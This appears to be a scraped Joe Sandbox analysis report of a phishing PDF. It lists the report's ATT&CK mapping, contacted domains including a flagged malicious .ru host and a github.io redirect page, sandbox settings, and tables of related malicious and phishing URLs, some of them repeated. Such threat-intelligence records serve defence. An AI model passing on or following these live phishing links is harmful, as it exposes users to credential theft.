    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Spearphishing Link
    Windows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Information Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Dec 2024_12192924_Image.pdf2%VirustotalBrowse
    Dec 2024_12192924_Image.pdf0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    199.232.214.172
    truefalse
      high
      d1nhsro6ypf0az.cloudfront.net
      108.158.75.114
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          code.jquery.com
          151.101.66.137
          truefalse
            high
            www.google.com
            142.250.181.132
            truefalse
              high
              purogosouls.github.io
              185.199.108.153
              truefalse
                unknown
                8g.tolirax.ru
                104.21.49.70
                truetrue
                  unknown
                  us-east-2.protection.sophos.com
                  unknown
                  unknownfalse
                    high
                    x1.i.lencr.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://8g.tolirax.ru/3JCtG/true
                        unknown
                        https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzAfalse
                          high
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            https://a.nel.cloudflare.com/report/v4?s=eeeNXmnhpt9%2FvngBOAkuJYcanjlCHZiR7D7HQEo%2Fq1vBnhfxkrdQdOr0EHJZ3QerJuBLDL28YuJ9CDo%2BiFWJKD2jGH2qnTLSyudlVXmdC4MiRFRlOcIqtHBv4h23Ug%3D%3Dfalse
                              high
                              https://purogosouls.github.io/favicon.icofalse
                                unknown
                                https://purogosouls.github.io/64ds6f4s9d4f89sd4sf46sd4f6/false
                                  unknown
                                  https://8g.tolirax.ru/favicon.icofalse
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                                      high
                                      https://githubstatus.comchromecache_199.10.drfalse
                                        high
                                        https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodDec 2024_12192924_Image.pdffalse
                                          high
                                          https://help.github.com/pages/chromecache_199.10.drfalse
                                            high
                                            https://twitter.com/githubstatuschromecache_199.10.drfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              142.250.181.132
                                              www.google.comUnited States
                                              15169GOOGLEUSfalse
                                              239.255.255.250
                                              unknownReserved
                                              unknownunknownfalse
                                              104.21.49.70
                                              8g.tolirax.ruUnited States
                                              13335CLOUDFLARENETUStrue
                                              151.101.66.137
                                              code.jquery.comUnited States
                                              54113FASTLYUSfalse
                                              185.199.108.153
                                              purogosouls.github.ioNetherlands
                                              54113FASTLYUSfalse
                                              151.101.194.137
                                              unknownUnited States
                                              54113FASTLYUSfalse
                                              35.190.80.1
                                              a.nel.cloudflare.comUnited States
                                              15169GOOGLEUSfalse
                                              108.158.75.114
                                              d1nhsro6ypf0az.cloudfront.netUnited States
                                              16509AMAZON-02USfalse
                                              IP
                                              192.168.2.4
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1578696
                                              Start date and time:2024-12-20 06:17:46 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 45s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:defaultwindowspdfcookbook.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:12
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Dec 2024_12192924_Image.pdf
                                              Detection:MAL
                                              Classification:mal56.phis.winPDF@40/63@15/9
                                              Cookbook Comments:
                                              • Found application associated with file extension: .pdf
                                              • Found PDF document
                                              • Close Viewer
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.218.208.137, 2.19.126.143, 2.19.126.149, 34.237.241.83, 18.213.11.84, 54.224.241.105, 50.16.47.176, 162.159.61.3, 172.64.41.3, 23.195.39.65, 199.232.214.172, 192.229.221.95, 142.250.181.99, 172.217.17.78, 64.233.164.84, 142.250.181.142, 172.217.17.42, 172.217.17.74, 142.250.181.138, 172.217.19.202, 216.58.208.234, 172.217.19.10, 142.250.181.10, 172.217.19.234, 142.250.181.106, 142.250.181.42, 172.217.21.42, 142.250.181.74, 172.217.17.35, 142.250.181.46, 2.20.62.163, 3.219.243.226, 23.56.162.204, 20.12.23.50, 13.107.246.63
                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              TimeTypeDescription
                                              00:18:54API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              239.255.255.250http://senalongley.comGet hashmaliciousUnknownBrowse
                                                https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                  Executed_Innocap-#81(Final.pdfGet hashmaliciousUnknownBrowse
                                                    https://pass-ga.com/Get hashmaliciousUnknownBrowse
                                                      http://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                                        https://workrubinnovations.com/wp-includes/kih/login.html?General=hLskkvfnVcqEPbdrK7sunT26PsAphHOxpizUKt2RC0aCijWkm4KdKAm8rk2qEAtO77hTNQ1F3KTfWtNkeEuTUzu5miygK9V9H06Get hashmaliciousHTMLPhisherBrowse
                                                          https://ryouthed.com/click.php?key=ij553tkpbj8t1lsuduh3&SUB_ID_SHORT=47f1db28f063a1d38918a2dcc31e91eb&COST_CPC=0.000050&PLACEMENT_ID=25101964&CAMPAIGN_ID=1170410&PUBLISHER_ID=2361353&ZONE_ID=4463547Get hashmaliciousUnknownBrowse
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                              https://docs.google.com/presentation/d/e/2PACX-1vRbuxCSjoSTqnuwwycGfoopwUno5J5X0s9YIzYdS1Me8P6MAP3FFMvOzHT6E_SBRsWcXRtJqZiYhJR5/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                                                https://drive.google.com/file/d/1zySfUjQ3GqIVAlBHIX3CXdgIcWIqrMkO/view?usp=sharing_eip&ts=67645d30Get hashmaliciousUnknownBrowse
                                                                  151.101.66.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                                  • code.jquery.com/jquery-3.3.1.min.js
                                                                  http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                  • code.jquery.com/jquery-1.7.min.js
                                                                  http://site9615380.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                  • code.jquery.com/jquery-1.7.2.min.js
                                                                  http://grandprairie-water-damage-restoration.comGet hashmaliciousUnknownBrowse
                                                                  • code.jquery.com/jquery-3.3.1.min.js
                                                                  2023121142000021ki01kvjs.htmlGet hashmaliciousUnknownBrowse
                                                                  • code.jquery.com/jquery-latest.min.js
                                                                  185.199.108.153upx_rufus.exeGet hashmaliciousUnknownBrowse
                                                                  • rufus.akeo.ie/Rufus_win.ver
                                                                  http://ikergalindez.github.io/gofish/Get hashmaliciousHTMLPhisherBrowse
                                                                  • ikergalindez.github.io/gofish/
                                                                  http://hassan6077224.github.io/netflixclonetechtitansGet hashmaliciousHTMLPhisherBrowse
                                                                  • hassan6077224.github.io/netflixclonetechtitans
                                                                  http://barik-ankita.github.io/Netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                  • barik-ankita.github.io/Netflix-clone
                                                                  http://kashishoza.github.io/Netflix-CloneGet hashmaliciousHTMLPhisherBrowse
                                                                  • kashishoza.github.io/Netflix-Clone
                                                                  http://shreyascyber.github.io/Netflix-CloneGet hashmaliciousHTMLPhisherBrowse
                                                                  • shreyascyber.github.io/Netflix-Clone
                                                                  http://amit-7890.github.io/NetflixGet hashmaliciousHTMLPhisherBrowse
                                                                  • amit-7890.github.io/Netflix
                                                                  http://pranjalirmane.github.io/netflix-homepageGet hashmaliciousHTMLPhisherBrowse
                                                                  • pranjalirmane.github.io/netflix-homepage
                                                                  http://sachinchaunal.github.io/Netflix-Clone-Old-VersionGet hashmaliciousHTMLPhisherBrowse
                                                                  • sachinchaunal.github.io/Netflix-Clone-Old-Version
                                                                  http://him9155.github.io/Netflix_cloneGet hashmaliciousHTMLPhisherBrowse
                                                                  • him9155.github.io/Netflix_clone
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  d1nhsro6ypf0az.cloudfront.netFW+Review_&_sign_Docu+#31617+Contract_Agreement+Docusign+Licensing+Board+Of+Directors.pdf.emlGet hashmaliciousUnknownBrowse
                                                                  • 143.204.215.60
                                                                  2024-09-20 09_ Sandbox .pngGet hashmaliciousHTMLPhisherBrowse
                                                                  • 143.204.215.124
                                                                  https://us-east-2.protection.sophos.com/?d=beehiiv.com&u=aHR0cHM6Ly9saW5rLm1haWwuYmVlaGlpdi5jb20vbHMvY2xpY2s_dXBuPXUwMDEublhka2JOSUpSeEZBS3VJWUJaMjU1N3l4Ujd6TmpDcFhIYW5SQnlyQXY3ZHMzMDZEQ091c3dBUU0yYzhiZFN4b1BudElFVWpoUzJhdzI1aDJUcWNiZVVCdXQ3WEhqcHZMejN4aS0yRnBZN2NYb3RNbXNIRlVyUkd5RDAzTGhIZms2a2E1ZGZEVFpCSlVkWnpOandHYUJsR0x3U1B4MlN1TVNIWEl5ZlI3YVdDNW1aeFNQLTJCUWFOUmpzMlpwblRwbmxpLTJGX245c19sZUtscWNRUnJvOGtNTXJocHFZOENpeTQ4MnhLUmJTM1NZcE16TVUtMkY5c0VvdjNqMExCNE1kOVZ3WUJvOEY2bEhJTllZbE90LTJGcjRQd1FwOXdCVmFuUXpmRy0yQnZlaFF5WVBjamlVbFpSN3VSaHJFbWFrLTJCYXY5T2RyYldyREphTmo3ck1iNmlhckR2Rjh1d2xPeDZ5VFY5ODFHLTJGejZiRDczakVOVHk4M0pXa2kzVzNTSzRBRURwQjd3dEg4blRyZ203ZjYxaEg2enlzYjFLYVl0S0pyWUJjU2QxNTN2SDQ5eDlTeW5acVZ0TGdqN2RrWU1FRkE1NzV6WWF6b2UwQmw2UnVUM1RHTkJiU2JpOHhUNUFnRGJMUjY4TlU1ay0yRmtDVFJtOHJrWWRMSDBNRGgtMkY3c1J6dVE4TEJxeDBvQzZ6WXVFQk0xRVFBdGI3eGxMZVEtMkJ5SEtiOE4yVHV0TFdpVEk4amc4b3U5MTkxRlM5SDEyLTJCbnJpT0hESVo2Nk1yd3pIeTRScFBQWlAtMkJ0Y1NscGt2Z01HT2F5Nmx6UGlCdE1MeGRrODI5eGU3TThFT1VLRDR2UHIxZFdYZ3c3MjFQQjFNa3k=&i=NWNiNGNiOGY1NWZlOGIxMTAwZmUxN2Uy&t=YUVvbWN0aDQzMW4yV29uam9nK2tUNmU1dStvM2VicUNJeENiWDR5Zk1nTT0=&h=ddfea45e1610491898abc824d1dabad5&s=AVNPUEhUT0NFTkNSWVBUSVaKXvCVdmaYUeJ4sMCGgh9xhnT0RF3qCfPvI6ciaUbnMgGet hashmaliciousUnknownBrowse
                                                                  • 18.172.153.4
                                                                  FW Server Notice Heatherg System Alert Notification..emlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 18.173.166.123
                                                                  https://us-east-2.protection.sophos.com?d=screenconnect.com&u=aHR0cHM6Ly9pbnZhdXRoc3NvLnNjcmVlbmNvbm5lY3QuY29tL0Jpbi9TY3JlZW5Db25uZWN0LkNsaWVudFNldHVwLmV4ZT9lPUFjY2VzcyZ5PUd1ZXN0JnQ9cnpqdmxwZ2JHeGFwZXhrSE1YeVpaUnRIbnBGSENDUGRibGZkU05weGpLUG9YdmVhT2omYz12YWwmYz1rckJ2cSZjPTI2NTA3MzY4NSZjPTY2NTE5MDY4JmM9ODIzNjE4MSZjPTIwODg2MCZjPTU0NTczJmM9&i=NWRhOWM5ZTM4ZWZlOTExNjdmZjU4YWFi&t=eXhhUTZYSEJKc0diTjdGR2JjNG4vOHNKbmhvbVdYTG9DVVJ5R0hmZXRvZz0=&h=26351d73de554e6e824184a04530ab82&s=AVNPUEhUT0NFTkNSWVBUSVZoWs2suqsb6VQLf5-mxgvzvRlwgv86PWTETDhsZDMp-_p9OBuNv5LfXkhlC2DvgXLGOMephggYjfKm54n5UCkmoJBDVw_uPG5cQMN8hcye2NoHsLYS_tuUoX350j9eYWoGet hashmaliciousScreenConnect ToolBrowse
                                                                  • 52.85.247.128
                                                                  https://us-east-2.protection.sophos.com/?d=google.com&u=aHR0cHM6Ly9kb2NzLmdvb2dsZS5jb20vcHJlc2VudGF0aW9uL2QvZS8yUEFDWC0xdlRDQjFtTTc2X0UzWTRxYU9yR2hCeU1ua2E2dnBFVFg2Wi1leE9YbmVnaW1jSTdrY0I2RWxxZmZhSmhnSzc3cmplUEdhX0FXa00zQmhGSi9wdWI_c3RhcnQ9ZmFsc2UmbG9vcD1mYWxzZSZkZWxheW1zPTMwMDA=&i=NjE4OTVkMzQ5YjRkNzYwZTM4YzhiNTFl&t=VGdCSldBY0JLaXZkbjZVM2s5L2d0djVuNGlSL29MdjdNaXV3TWRsdUdPOD0=&h=2c4926b4926f4a5a83eba5ef4eff7a86&s=AVNPUEhUT0NFTkNSWVBUSVakzURzgxsw1sA-gW3_GIj4nARFCUV6EwR4SmqfM6fpiAGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                  • 18.173.132.108
                                                                  https://us-east-2.protection.sophos.com/?d=getresponse.com&u=aHR0cHM6Ly9hcHAuZ2V0cmVzcG9uc2UuY29tL2NsaWNrLmh0bWw_eD1hNjJiJmxjPWhHV1ZlWSZtYz1KUCZzPUJPOWlFRGUmdT10amo4cyZ6PUV5TFFKd0Ym&i=NjNiMjEzMmQ2YzIzYmUxMmI2MjdlN2Jm&t=UU5mcFBRd3ZEVDFFalovL3NnVE9NNXBBT29aV2lKVEkzSng1RlcxY1AvRT0=&h=2f07214878e0427080b5bd082a28a4a8&s=AVNPUEhUT0NFTkNSWVBUSVYyyG7MgRimdeSZs9PFo0JJzdsqn-bVQtHV9h09dNzEVwGet hashmaliciousHTMLPhisherBrowse
                                                                  • 18.165.183.84
                                                                  https://us-east-2.protection.sophos.com?d=canva.com&u=aHR0cHM6Ly93d3cuY2FudmEuY29tL2Rlc2lnbi9EQUZPMVV3djJDdy91WXBBbXFZT055aE1EMlo0VlI1UTZBL3ZpZXc=&i=NWQwMTFlZTYxMjgyMzExNGExOGUwOWFk&t=MjROK1dNTkZLdWh6b1c3NWNGbFBCU3I1YjlHcjNPQm9rcU9DU1I1cDlLbz0=&h=1a302b3c6ab14442b4c4381603181374&s=AVNPUEhUT0NFTkNSWVBUSVZXj7M6bQkN3TFtbHyGqInJT+bSpVAAl915An0VnWfjfQ==Get hashmaliciousUnknownBrowse
                                                                  • 13.225.34.28
                                                                  https://us-east-2.protection.sophos.com/?d=mileskimball.com&u=aHR0cHM6Ly9jb250ZW50Lm1pbGVza2ltYmFsbC5jb20vP0ZGanN5UjFTSjk1eG45ZjIxdjlmTXVxU29rZGJFS3NVRiZodHRwOi8vVVpFbGp4clguWU80ZWlzYy5veHlnZW5hbG1hcy5pci8_aWQ9cGV0ZXJAZGVlcC10cmVlLmNvbQ==&i=NWRkZGEyYzNiYmMzMTcxNjYzZTc0ZjM4&t=VTFObFhGNlcxWU1RMDN0dlVmaVZZZkdEaVJOSkRGU3RBUXpwMmc5anZ1ND0=&h=f05993dfec9a48d3bf0e17818ef3f2c9Get hashmaliciousHTMLPhisherBrowse
                                                                  • 143.204.215.51
                                                                  bg.microsoft.map.fastly.netinvoice.docmGet hashmaliciousUnknownBrowse
                                                                  • 199.232.214.172
                                                                  bad.txtGet hashmaliciousAsyncRATBrowse
                                                                  • 199.232.214.172
                                                                  ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 199.232.214.172
                                                                  2JSGOlbNym.dllGet hashmaliciousUnknownBrowse
                                                                  • 199.232.214.172
                                                                  4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                  • 199.232.214.172
                                                                  I3FtIOCni3.dllGet hashmaliciousGhostRatBrowse
                                                                  • 199.232.214.172
                                                                  26B1sczZ88.dllGet hashmaliciousVirutBrowse
                                                                  • 199.232.210.172
                                                                  UV0zBp62hW.dllGet hashmaliciousVirutBrowse
                                                                  • 199.232.210.172
                                                                  Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                                  • 199.232.214.172
                                                                  https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                  • 199.232.214.172
                                                                  code.jquery.comhttp://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                                                  • 151.101.130.137
                                                                  https://workrubinnovations.com/wp-includes/kih/login.html?General=hLskkvfnVcqEPbdrK7sunT26PsAphHOxpizUKt2RC0aCijWkm4KdKAm8rk2qEAtO77hTNQ1F3KTfWtNkeEuTUzu5miygK9V9H06Get hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.194.137
                                                                  https://docs.google.com/presentation/d/e/2PACX-1vRbuxCSjoSTqnuwwycGfoopwUno5J5X0s9YIzYdS1Me8P6MAP3FFMvOzHT6E_SBRsWcXRtJqZiYhJR5/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.130.137
                                                                  https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.194.137
                                                                  https://supercrete.lk/m/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.130.137
                                                                  (Lhambright)VWAV.htmlGet hashmaliciousUnknownBrowse
                                                                  • 151.101.194.137
                                                                  EFT Remittance_(Dmorris)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                  • 151.101.66.137
                                                                  Timesheet ACH-Tbconsulting.November 16, 2024.htmlGet hashmaliciousUnknownBrowse
                                                                  • 151.101.130.137
                                                                  https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                  • 151.101.2.137
                                                                  https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.130.137
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUShttp://senalongley.comGet hashmaliciousUnknownBrowse
                                                                  • 104.21.96.47
                                                                  https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                                  • 1.1.1.1
                                                                  c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.26.12.205
                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                  • 104.21.23.76
                                                                  Executed_Innocap-#81(Final.pdfGet hashmaliciousUnknownBrowse
                                                                  • 104.21.11.54
                                                                  https://pass-ga.com/Get hashmaliciousUnknownBrowse
                                                                  • 1.1.1.1
                                                                  http://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                                                  • 172.67.215.242
                                                                  la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                  • 1.14.178.20
                                                                  https://workrubinnovations.com/wp-includes/kih/login.html?General=hLskkvfnVcqEPbdrK7sunT26PsAphHOxpizUKt2RC0aCijWkm4KdKAm8rk2qEAtO77hTNQ1F3KTfWtNkeEuTUzu5miygK9V9H06Get hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.25.14
                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                  • 104.21.91.209
                                                                  FASTLYUShttp://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                                                  • 151.101.130.137
                                                                  https://workrubinnovations.com/wp-includes/kih/login.html?General=hLskkvfnVcqEPbdrK7sunT26PsAphHOxpizUKt2RC0aCijWkm4KdKAm8rk2qEAtO77hTNQ1F3KTfWtNkeEuTUzu5miygK9V9H06Get hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.194.137
                                                                  https://docs.google.com/presentation/d/e/2PACX-1vRbuxCSjoSTqnuwwycGfoopwUno5J5X0s9YIzYdS1Me8P6MAP3FFMvOzHT6E_SBRsWcXRtJqZiYhJR5/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.2.137
                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                  • 185.199.109.133
                                                                  ghostspider.7zGet hashmaliciousUnknownBrowse
                                                                  • 151.101.65.91
                                                                  https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.194.137
                                                                  https://supercrete.lk/m/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.130.137
                                                                  ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 185.199.110.133
                                                                  bad.txtGet hashmaliciousAsyncRATBrowse
                                                                  • 199.232.214.172
                                                                  ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 185.199.110.133
                                                                  FASTLYUShttp://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                                                  • 151.101.130.137
                                                                  https://workrubinnovations.com/wp-includes/kih/login.html?General=hLskkvfnVcqEPbdrK7sunT26PsAphHOxpizUKt2RC0aCijWkm4KdKAm8rk2qEAtO77hTNQ1F3KTfWtNkeEuTUzu5miygK9V9H06Get hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.194.137
                                                                  https://docs.google.com/presentation/d/e/2PACX-1vRbuxCSjoSTqnuwwycGfoopwUno5J5X0s9YIzYdS1Me8P6MAP3FFMvOzHT6E_SBRsWcXRtJqZiYhJR5/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.2.137
                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                  • 185.199.109.133
                                                                  ghostspider.7zGet hashmaliciousUnknownBrowse
                                                                  • 151.101.65.91
                                                                  https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.194.137
                                                                  https://supercrete.lk/m/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.130.137
                                                                  ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 185.199.110.133
                                                                  bad.txtGet hashmaliciousAsyncRATBrowse
                                                                  • 199.232.214.172
                                                                  ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 185.199.110.133
                                                                  FASTLYUShttp://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                                                  • 151.101.130.137
                                                                  https://workrubinnovations.com/wp-includes/kih/login.html?General=hLskkvfnVcqEPbdrK7sunT26PsAphHOxpizUKt2RC0aCijWkm4KdKAm8rk2qEAtO77hTNQ1F3KTfWtNkeEuTUzu5miygK9V9H06Get hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.194.137
                                                                  https://docs.google.com/presentation/d/e/2PACX-1vRbuxCSjoSTqnuwwycGfoopwUno5J5X0s9YIzYdS1Me8P6MAP3FFMvOzHT6E_SBRsWcXRtJqZiYhJR5/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.2.137
                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                  • 185.199.109.133
                                                                  ghostspider.7zGet hashmaliciousUnknownBrowse
                                                                  • 151.101.65.91
                                                                  https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.194.137
                                                                  https://supercrete.lk/m/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 151.101.130.137
                                                                  ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 185.199.110.133
                                                                  bad.txtGet hashmaliciousAsyncRATBrowse
                                                                  • 199.232.214.172
